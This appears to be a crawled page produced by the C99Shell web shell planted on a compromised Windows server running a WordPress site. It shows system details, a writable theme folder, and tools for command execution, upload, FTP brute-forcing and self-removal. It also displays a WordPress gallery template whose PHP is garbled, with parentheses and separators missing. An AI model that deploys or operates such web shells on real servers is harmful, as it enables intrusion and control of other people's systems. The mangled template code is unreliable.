!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

C:\cumbreclima\wp-content\themes\patti\   drwxrwxrwx
Free 4.13 GB of 39.52 GB (10.45%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     gallery-template.php (5.26 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/*
Template Name: Gallery Template
* Version: 1.2.2
*/
?>
<?php get_header
(); ?>
    <div id="primary" class="content-area">
        <div id="container" class="site-content site-main">
            <div id="content" class="hentry">
                <h1 class="home_page_title entry-header"><?php the_title(); ?></h1>
                <?php if ( ! post_password_required() ) { ?>
                    <?php if ( function_exists'pdfprnt_show_buttons_for_custom_post_type' ) ) 
                        echo 
pdfprnt_show_buttons_for_custom_post_type'post_type=gallery&orderby=post_date' ); ?>
                    <div class="gallery_box entry-content">
                        <ul>
                            <?php global $post$wpdb$wp_query$request;
                                
                            if ( 
get_query_var'paged' ) ) {
                                
$paged get_query_var'paged' );
                            } elseif ( 
get_query_var'page' ) ) {
                                
$paged get_query_var'page' );
                            } else {
                                
$paged 1;
                            }

                            
$permalink get_permalink();
                            
$gllr_options get_option'gllr_options' );
                            
$count 0;
                            
$per_page $showitems get_option'posts_per_page' );  
                            
$count_all_albums $wpdb->get_var"SELECT COUNT(*) FROM $wpdb->posts WHERE $wpdb->posts.post_type = 'gallery' AND ($wpdb->posts.post_status = 'publish')" );

                            if ( 
substr$permalinkstrlen$permalink ) -) != "/" ) {
                                if ( 
strpos$permalink"?" ) !== false ) {
                                    
$permalink substr$permalink0strpos$permalink"?" ) -) . "/";
                                } else {
                                    
$permalink .= "/";
                                }
                            }

                            
$args = array(
                                
'post_type'                => 'gallery',
                                
'post_status'            => 'publish',
                                
'orderby'                => 'post_date',
                                
'posts_per_page'        => $per_page,
                                
'paged'                    => $paged
                            
);
                            
$second_query = new WP_Query$args );

                            if ( 
function_exists'pdfprnt_show_buttons_for_custom_post_type' ) ) 
                                echo 
pdfprnt_show_buttons_for_custom_post_type$second_query );
                            
                            
$request $second_query->request;

                            if ( 
$second_query->have_posts() ) : 
                                while ( 
$second_query->have_posts() ) : $second_query->the_post();
                                    
$attachments    get_post_thumbnail_id$post->ID );
                                    if ( empty ( 
$attachments ) ) {
                                        
$attachments get_children'post_parent='.$post->ID.'&post_type=attachment&post_mime_type=image&numberposts=1' );
                                        
$id key$attachments );
                                        
$image_attributes wp_get_attachment_image_src$id'album-thumb' );
                                    } else {
                                        
$image_attributes wp_get_attachment_image_src$attachments'album-thumb' );
                                    }
                                    if ( 
== $gllr_options['border_images'] ) {
                                        
$gllr_border 'border-width: ' $gllr_options['border_images_width'].'px; border-color:'.$gllr_options['border_images_color'].'; padding:0;';
                                        
$gllr_border_images $gllr_options['border_images_width'] * 2;
                                    } else {
                                        
$gllr_border 'padding:0;';
                                        
$gllr_border_images 0;
                                    }
                                    
$count++; ?>
                                    <li>
                                        <a rel="bookmark" href="<?php echo get_permalink(); ?>" title="<?php the_title(); ?>">
                                            <img width="<?php echo $gllr_options['gllr_custom_size_px'][0][0]; ?>" height="<?php echo $gllr_options['gllr_custom_size_px'][0][1]; ?>" style="width:<?php echo $gllr_options['gllr_custom_size_px'][0][0]; ?>px; height:<?php echo $gllr_options['gllr_custom_size_px'][0][1]; ?>px; <?php echo $gllr_border?>" alt="<?php the_title(); ?>" title="<?php the_title(); ?>" src="<?php echo $image_attributes[0]; ?>" />
                                        </a>
                                        <div class="gallery_detail_box">
                                            <div><?php the_title(); ?></div>
                                            <div><?php echo the_excerpt_max_charlength100 ); ?></div>
                                            <a href="<?php echo $permalink; echo basenameget_permalink$post->ID ) ); ?>"><?php echo $gllr_options["read_more_link_text"]; ?></a>
                                        </div><!-- .gallery_detail_box -->
                                        <div class="gllr_clear"></div>
                                    </li>
                                <?php endwhile; 
                            endif; 
                            
wp_reset_query(); 
                            
$request $wp_query->request?>
                        </ul>
                    </div><!-- .gallery_box -->
                    </div><!-- #content -->
                    <?php $pages intval$count_all_albums $per_page );
                    if ( 
$count_all_albums $per_page )
                        
$pages += 1;
                    
$range 100;
                    if ( ! 
$pages ) {
                        
$pages 1;
                    }
                    if ( 
!= $pages ) { ?>
                        <div class='gllr_clear'></div>
                        <nav class="paging-navigation" role="navigation">
                            <div class="pagination navigation loop-pagination nav-links">
                                <?php for ( $i 1$i <= $pages$i++ ) {
                                    if ( 
!= $pages && ( !( $i >= $paged $range || $i <= $paged $range ) || $pages <= $showitems ) ) {
                                        echo ( 
$paged == $i ) ? "<span class='page-numbers current'>"$i ."</span>":"<a class='page-numbers inactive' href='"get_pagenum_link($i) ."'>"$i ."</a>";
                                    }
                                } 
?>
                                <div class='gllr_clear'></div>
                            </div><!-- .pagination -->        
                        </nav><!-- .paging-navigation -->
                    <?php }
                } else { 
?>
                    <div class="gallery_box entry-content">
                        <p><?php echo get_the_password_form(); ?></p>
                    </div><!-- .gallery_box -->
                    </div><!-- #content -->
                <?php ?>            
            <?php comments_template(); ?>
        </div><!-- #container -->
    </div><!-- .content-area -->
<?php get_sidebar(); ?>
<?php get_footer
(); ?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0312 ]--